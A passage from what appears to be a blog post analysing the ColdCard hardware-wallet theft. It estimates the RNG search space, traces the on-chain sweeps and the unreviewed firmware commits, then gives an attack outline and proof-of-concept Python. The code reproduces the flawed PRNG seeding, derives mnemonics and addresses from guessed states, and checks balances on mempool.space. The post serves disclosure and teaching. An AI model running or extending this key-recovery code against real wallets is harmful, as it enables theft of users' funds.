<li>Because Mk2/Mk3 RTC values likely start at zero or a static value on cold boot, as <a href="https://engineering.block.xyz/blog/predictable-rng-fallback-and-32-bit-reseed-in-coldcard-firmware"target="_blank" rel="noopener">Block</a> points out, SysTick alone shrinks the space to ~80,000 values (~16 bits), making the search trivial in seconds.</li>
</ul>
<p>Mk4/Q/Mk5 with reseed depends on how well the fallback is known:</p>
<ul>
<li>If the fallback is known, only the <strong>32 bits</strong> from the secure element remain: 2^32 ≈ <strong>4.3 billion</strong> candidates per device, or about <strong>1.2 hours</strong> per device at 1 million/s.</li>
<li>If the fallback is completely unknown, the space rises to ~2^72, about <strong>4.7 sextillion</strong> candidates — infeasible by brute force alone.</li>
</ul>
<p>That is why the first wave should be dominated by Mk3. The second wave, more than a day later, may include additional batches of the same model or harder models where the attacker managed to profile the fallback. Without identifying the model behind each address, we cannot say for sure, but the difficulty order is clear.</p>
<p>The speed also shows the attack did not start from scratch on July 30. To search 1.1 trillion states and find hundreds of funded addresses, the attacker already had infrastructure ready or spent days or weeks pre-computing before moving the first UTXOs.</p>
<h2>What the chain reveals about the operation<span class="hx:absolute hx:-mt-20" id="what-the-chain-reveals-about-the-operation"></span>
    <a href="#what-the-chain-reveals-about-the-operation" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p><a href="https://coldcard-hack.up.railway.app/"target="_blank" rel="noopener">coldcard-hack.up.railway.app</a> analyzes in detail the three waves that emptied 1,082.59 BTC in <strong>41 minutes</strong> (blocks 960183 to 960191). Although the site warns it was compiled by an AI agent and not human-reviewed, the blockchain data is verifiable:</p>
<table>
  <thead>
      <tr>
          <th>Wave</th>
          <th>Block(s)</th>
          <th>BTC</th>
          <th>Addresses</th>
          <th>Note</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>960183</td>
          <td>~89.62</td>
          <td>204</td>
          <td>Took everything, including dust below the fee value.</td>
      </tr>
      <tr>
          <td>2</td>
          <td>960185</td>
          <td>~398.49</td>
          <td>491</td>
          <td>Densest burst; left balances below ~0.108 BTC.</td>
      </tr>
      <tr>
          <td>3</td>
          <td>960188–960191</td>
          <td>~594.48</td>
          <td>500</td>
          <td>The wave the press reported; started 3.5 minutes after wave 2.</td>
      </tr>
  </tbody>
</table>
<p>Notable details:</p>
<ul>
<li><strong>Sorted by balance:</strong> within each wave, transactions were ordered from largest to smallest balance. That is not an accident; it is a priority queue configured in the script.</li>
<li><strong>Identical shape:</strong> all 1,195 sweeps spend every UTXO from a single source address into a single output, with no change. No manual variation.</li>
<li><strong>Uniform fee rate:</strong> median of 30.136986 sat/vB across all waves — the same script choosing the fee.</li>
<li><strong>Address types:</strong> 1,182 were native SegWit (<code>v0_p2wpkh</code>), 7 P2SH-wrapped, and 6 legacy. So the attack was not limited to BIP84, although most ColdCard users hold bech32.</li>
<li><strong>Funds still sitting:</strong> when the site froze its data, the ~1,082 BTC were still in the vaults, with no mixing, no peel chain, and no subsequent movement.</li>
</ul>
<p>All of this points to a single automated operation, not 1,195 independent thefts.</p>
<h2>How this slipped through<span class="hx:absolute hx:-mt-20" id="how-this-slipped-through"></span>
    <a href="#how-this-slipped-through" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The same <a href="https://coldcard-hack.up.railway.app/"target="_blank" rel="noopener">coldcard-hack.up.railway.app</a> maps the commits that introduced the bug. The most damning facts:</p>
<ul>
<li>The commit that added the wrong <code>#ifndef</code> guard in <code>libngu</code> had a <strong>one-character message</strong>, changed 28 files, and <strong>did not go through a pull request</strong>.</li>
<li>The <code>First pass w/ libNgU</code> commit, which migrated seed generation to libngu and stripped GPL code, changed <strong>120 files</strong> and was also pushed directly, with no PR.</li>
<li>The two later commits that added the 32-bit reseed and the secure-element mixing did open pull requests, but <strong>merged with zero reviews</strong>.</li>
</ul>
<p>A critical change in the entropy-generation path went through without end-to-end review. The correct TRNG existed in the binary; the problem was that the wrong symbol got linked, and nobody wrote a test proving where the seed actually came from.</p>
<h2>The conceptual attack flow<span class="hx:absolute hx:-mt-20" id="the-conceptual-attack-flow"></span>
    <a href="#the-conceptual-attack-flow" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Before the code, the general flow:</p>
<ol>
<li><strong>Reproduce the RNG.</strong> The attacker implements Yasmarang exactly as in the firmware, including the XOR with the second Yasmarang in <code>libNgU</code>.</li>
<li><strong>Enumerate plausible states.</strong> For every combination of UID, SysTick, RTC, and — on newer models — secure-element reseed, they generate the 32 bytes that the ColdCard would have produced as entropy.</li>
<li><strong>Derive the wallet.</strong> From that entropy, compute the BIP39 mnemonic, the BIP32 seed, and the first receiving and change addresses.</li>
<li><strong>Query the blockchain.</strong> For each derived address, ask an explorer or a local node whether a UTXO exists.</li>
<li><strong>Stop at the match.</strong> When a derived address matches an address with balance, the attacker already has the corresponding private key.</li>
<li><strong>Spend.</strong> With the private key, build a transaction that moves the UTXO to an address they control.</li>
</ol>
<p>The blockchain is the oracle. Without it, the attacker would not know which state produced real money. With it, every UTXO found confirms they guessed the key.</p>
<h2>Proof-of-concept code<span class="hx:absolute hx:-mt-20" id="proof-of-concept-code"></span>
    <a href="#proof-of-concept-code" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The script below is didactic. It is not GPU-optimized, does not run in seconds against 40 bits, and does not handle every firmware variation. What it does is make the attack readable, function by function.</p>
<h3>1. The broken PRNG: Yasmarang<span class="hx:absolute hx:-mt-20" id="1-the-broken-prng-yasmarang"></span>
    <a href="#1-the-broken-prng-yasmarang" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">yasmarang_step</span><span class="p">(</span><span class="n">state</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="s2">&#34;&#34;&#34;state = [pad, n, d, dat]; mutates the list and returns a uint32.&#34;&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">pad</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">dat</span> <span class="o">=</span> <span class="n">state</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">pad</span> <span class="o">=</span> <span class="p">(</span><span class="n">pad</span> <span class="o">+</span> <span class="n">dat</span> <span class="o">+</span> <span class="n">d</span> <span class="o">*</span> <span class="n">n</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span>
</span></span><span class="line"><span class="cl">    <span class="n">pad</span> <span class="o">=</span> <span class="p">((</span><span class="n">pad</span> <span class="o">&lt;&lt;</span> <span class="mi">3</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">pad</span> <span class="o">&gt;&gt;</span> <span class="mi">29</span><span class="p">))</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span>
</span></span><span class="line"><span class="cl">    <span class="n">n</span> <span class="o">=</span> <span class="n">pad</span> <span class="o">|</span> <span class="mi">2</span>
</span></span><span class="line"><span class="cl">    <span class="n">d</span> <span class="o">=</span> <span class="p">(</span><span class="n">d</span> <span class="o">^</span> <span class="p">((</span><span class="n">pad</span> <span class="o">&lt;&lt;</span> <span class="mi">31</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">pad</span> <span class="o">&gt;&gt;</span> <span class="mi">1</span><span class="p">)))</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span>
</span></span><span class="line"><span class="cl">    <span class="n">dat</span> <span class="o">=</span> <span class="p">(</span><span class="n">dat</span> <span class="o">^</span> <span class="p">(</span><span class="n">pad</span> <span class="o">&amp;</span> <span class="mh">0xFF</span><span class="p">)</span> <span class="o">^</span> <span class="p">((</span><span class="n">d</span> <span class="o">&gt;&gt;</span> <span class="mi">8</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFF</span><span class="p">)</span> <span class="o">^</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFF</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">out</span> <span class="o">=</span> <span class="p">(</span><span class="n">pad</span>
</span></span><span class="line"><span class="cl">           <span class="o">^</span> <span class="p">((</span><span class="n">d</span> <span class="o">&lt;&lt;</span> <span class="mi">5</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">           <span class="o">^</span> <span class="p">(</span><span class="n">pad</span> <span class="o">&gt;&gt;</span> <span class="mi">18</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">           <span class="o">^</span> <span class="p">((</span><span class="n">dat</span> <span class="o">&lt;&lt;</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span><span class="p">))</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">state</span><span class="p">[:]</span> <span class="o">=</span> <span class="p">[</span><span class="n">pad</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">dat</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">out</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p><strong>What it does:</strong> implements the deterministic generator that was in the firmware. It is the same function anyone can copy from the <a href="https://raw.githubusercontent.com/micropython/micropython/master/ports/stm32/rng.c"target="_blank" rel="noopener">MicroPython source</a>.</p>
<p><strong>State example:</strong></p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="o">&gt;&gt;&gt;</span> <span class="n">s</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x0A8CE26F</span><span class="p">,</span> <span class="mi">69</span><span class="p">,</span> <span class="mi">233</span><span class="p">,</span> <span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="o">&gt;&gt;&gt;</span> <span class="p">[</span><span class="nb">hex</span><span class="p">(</span><span class="n">yasmarang_step</span><span class="p">(</span><span class="n">s</span><span class="p">))</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">3</span><span class="p">)]</span>
</span></span><span class="line"><span class="cl"><span class="p">[</span><span class="s1">&#39;0x12f99f10&#39;</span><span class="p">,</span> <span class="s1">&#39;0x1e0841df&#39;</span><span class="p">,</span> <span class="s1">&#39;0x8f794c6c&#39;</span><span class="p">]</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<h3>2. From RNG state to ColdCard entropy<span class="hx:absolute hx:-mt-20" id="2-from-rng-state-to-coldcard-entropy"></span>
    <a href="#2-from-rng-state-to-coldcard-entropy" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">coldcard_entropy</span><span class="p">(</span><span class="n">uid_low32</span><span class="p">,</span> <span class="n">systick</span><span class="p">,</span> <span class="n">rtc_tr</span><span class="p">,</span> <span class="n">rtc_ssr</span><span class="p">,</span> <span class="n">reseed</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="s2">&#34;&#34;&#34;
</span></span></span><span class="line"><span class="cl"><span class="s2">    Simulates what the ColdCard did to generate the 32 entropy bytes.
</span></span></span><span class="line"><span class="cl"><span class="s2">
</span></span></span><span class="line"><span class="cl"><span class="s2">    - MicroPython initializes its Yasmarang with:
</span></span></span><span class="line"><span class="cl"><span class="s2">        pad = UID_low32 ^ SysTick-&gt;VAL
</span></span></span><span class="line"><span class="cl"><span class="s2">        n   = RTC-&gt;TR
</span></span></span><span class="line"><span class="cl"><span class="s2">        d   = RTC-&gt;SSR
</span></span></span><span class="line"><span class="cl"><span class="s2">    - libNgU keeps a second Yasmarang with public constants.
</span></span></span><span class="line"><span class="cl"><span class="s2">    - Each 32-bit word is: chip ^ my_yasmarang().
</span></span></span><span class="line"><span class="cl"><span class="s2">    - On Mk4/Q/Mk5, reseed changes the libNgU &#39;pad&#39; state.
</span></span></span><span class="line"><span class="cl"><span class="s2">    &#34;&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">mpy_state</span> <span class="o">=</span> <span class="p">[</span><span class="n">uid_low32</span> <span class="o">^</span> <span class="n">systick</span><span class="p">,</span> <span class="n">rtc_tr</span><span class="p">,</span> <span class="n">rtc_ssr</span><span class="p">,</span> <span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">    <span class="n">libngu_state</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x0A8CE26F</span><span class="p">,</span> <span class="mi">69</span><span class="p">,</span> <span class="mi">233</span><span class="p">,</span> <span class="mi">0</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="n">reseed</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># reseed() in the firmware only overwrites yasmarang_pad</span>
</span></span><span class="line"><span class="cl">        <span class="n">libngu_state</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">reseed</span> <span class="o">&amp;</span> <span class="mh">0xFFFFFFFF</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="c1"># The ColdCard may make extra calls before generating the seed (health</span>
</span></span><span class="line"><span class="cl">    <span class="c1"># check, etc.). In practice the attacker models the exact call history.</span>
</span></span><span class="line"><span class="cl">    <span class="c1"># Here we simplify to 8 words = 32 bytes.</span>
</span></span><span class="line"><span class="cl">    <span class="n">words</span> <span class="o">=</span> <span class="p">[]</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">8</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="n">chip</span> <span class="o">=</span> <span class="n">yasmarang_step</span><span class="p">(</span><span class="n">mpy_state</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">mix</span> <span class="o">=</span> <span class="n">chip</span> <span class="o">^</span> <span class="n">yasmarang_step</span><span class="p">(</span><span class="n">libngu_state</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">words</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&lt;I&#34;</span><span class="p">,</span> <span class="n">mix</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="sa">b</span><span class="s2">&#34;&#34;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">words</span><span class="p">)</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p><strong>What it does:</strong> builds the initial state. The MicroPython <code>pad</code> is <code>UID_low32 ^ SysTick</code>; <code>n</code> and <code>d</code> come from the RTC. <code>libNgU</code> enters with public constants. Each word is the XOR of the two. That XOR does not create randomness: if both sides are reproducible, so is the result.</p>
<p><strong>Example:</strong></p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">&gt;&gt;&gt; coldcard_entropy(0xDEADBEEF, 12345, 0x123456, 78).hex()
</span></span><span class="line"><span class="cl">&#39;3013f52faaef2a65c47fee63c83e9773d505bd05e4b2b43f56bb8c60ecc66f66&#39;</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<h3>3. From entropy to a Bitcoin address<span class="hx:absolute hx:-mt-20" id="3-from-entropy-to-a-bitcoin-address"></span>
    <a href="#3-from-entropy-to-a-bitcoin-address" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">first_addresses</span><span class="p">(</span><span class="n">entropy_bytes</span><span class="p">,</span> <span class="n">account</span><span class="o">=</span><span class="mi">0</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="s2">&#34;&#34;&#34;
</span></span></span><span class="line"><span class="cl"><span class="s2">    Given the raw entropy, generate the BIP39 mnemonic, the BIP32 seed,
</span></span></span><span class="line"><span class="cl"><span class="s2">    and the first native SegWit receiving and change addresses.
</span></span></span><span class="line"><span class="cl"><span class="s2">    &#34;&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">mnemonic</span> <span class="o">=</span> <span class="n">mnemonic_from_bytes</span><span class="p">(</span><span class="n">entropy_bytes</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">seed</span> <span class="o">=</span> <span class="n">mnemonic_to_seed</span><span class="p">(</span><span class="n">mnemonic</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">root</span> <span class="o">=</span> <span class="n">HDKey</span><span class="o">.</span><span class="n">from_seed</span><span class="p">(</span><span class="n">seed</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">addrs</span> <span class="o">=</span> <span class="p">{</span><span class="s2">&#34;mnemonic&#34;</span><span class="p">:</span> <span class="n">mnemonic</span><span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="n">change</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">]:</span>
</span></span><span class="line"><span class="cl">        <span class="k">for</span> <span class="n">idx</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">5</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">            <span class="n">path</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">&#34;m/84&#39;/0&#39;/</span><span class="si">{</span><span class="n">account</span><span class="si">}</span><span class="s2">&#39;/</span><span class="si">{</span><span class="n">change</span><span class="si">}</span><span class="s2">/</span><span class="si">{</span><span class="n">idx</span><span class="si">}</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">            <span class="n">key</span> <span class="o">=</span> <span class="n">root</span><span class="o">.</span><span class="n">derive</span><span class="p">(</span><span class="n">path</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="n">addr</span> <span class="o">=</span> <span class="n">p2wpkh</span><span class="p">(</span><span class="n">key</span><span class="o">.</span><span class="n">key</span><span class="o">.</span><span class="n">get_public_key</span><span class="p">())</span><span class="o">.</span><span class="n">address</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">            <span class="n">label</span> <span class="o">=</span> <span class="s2">&#34;receive&#34;</span> <span class="k">if</span> <span class="n">change</span> <span class="o">==</span> <span class="mi">0</span> <span class="k">else</span> <span class="s2">&#34;change&#34;</span>
</span></span><span class="line"><span class="cl">            <span class="n">addrs</span><span class="o">.</span><span class="n">setdefault</span><span class="p">(</span><span class="n">label</span><span class="p">,</span> <span class="p">[])</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">addrs</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p><strong>What it does:</strong> takes the 32 bytes, turns them into 24 BIP39 words, computes the seed, opens the BIP32 tree, and derives the addresses. In practice the attacker tests dozens or hundreds of indexes and also other accounts.</p>
<p><strong>Example:</strong></p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">&gt;&gt;&gt; cand = first_addresses(coldcard_entropy(0xDEADBEEF, 12345, 0x123456, 78))
</span></span><span class="line"><span class="cl">&gt;&gt;&gt; cand[&#34;mnemonic&#34;]
</span></span><span class="line"><span class="cl">&#39;copy panic episode fiction verify cream ball worry glow draft place tray expect teach bleak north reflect wide puzzle boat attract glimpse rural setup&#39;
</span></span><span class="line"><span class="cl">&gt;&gt;&gt; cand[&#34;receive&#34;][0]
</span></span><span class="line"><span class="cl">&#39;bc1qc3rmdj3ln6n05awxwetg0gz8e2aw0lzyxmaecp&#39;</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<h3>4. Query the public blockchain as an oracle<span class="hx:absolute hx:-mt-20" id="4-query-the-public-blockchain-as-an-oracle"></span>
    <a href="#4-query-the-public-blockchain-as-an-oracle" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">has_utxo</span><span class="p">(</span><span class="n">address</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="s2">&#34;&#34;&#34;True if the address has any UTXO according to mempool.space.&#34;&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">url</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">&#34;https://mempool.space/api/address/</span><span class="si">{</span><span class="n">address</span><span class="si">}</span><span class="s2">/utxo&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">10</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">r</span><span class="o">.</span><span class="n">raise_for_status</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="nb">len</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">json</span><span class="p">())</span> <span class="o">&gt;</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl">    <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;error querying&#34;</span><span class="p">,</span> <span class="n">address</span><span class="p">,</span> <span class="n">e</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="kc">False</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p><strong>What it does:</strong> asks the real question. Without this query, the attacker would not know whether they guessed right. The blockchain is the oracle.</p>
<p><strong>Non-hit example:</strong></p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">&gt;&gt;&gt; has_utxo(&#34;bc1qc3rmdj3ln6n05awxwetg0gz8e2aw0lzyxmaecp&#34;)
</span></span><span class="line"><span class="cl">False</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
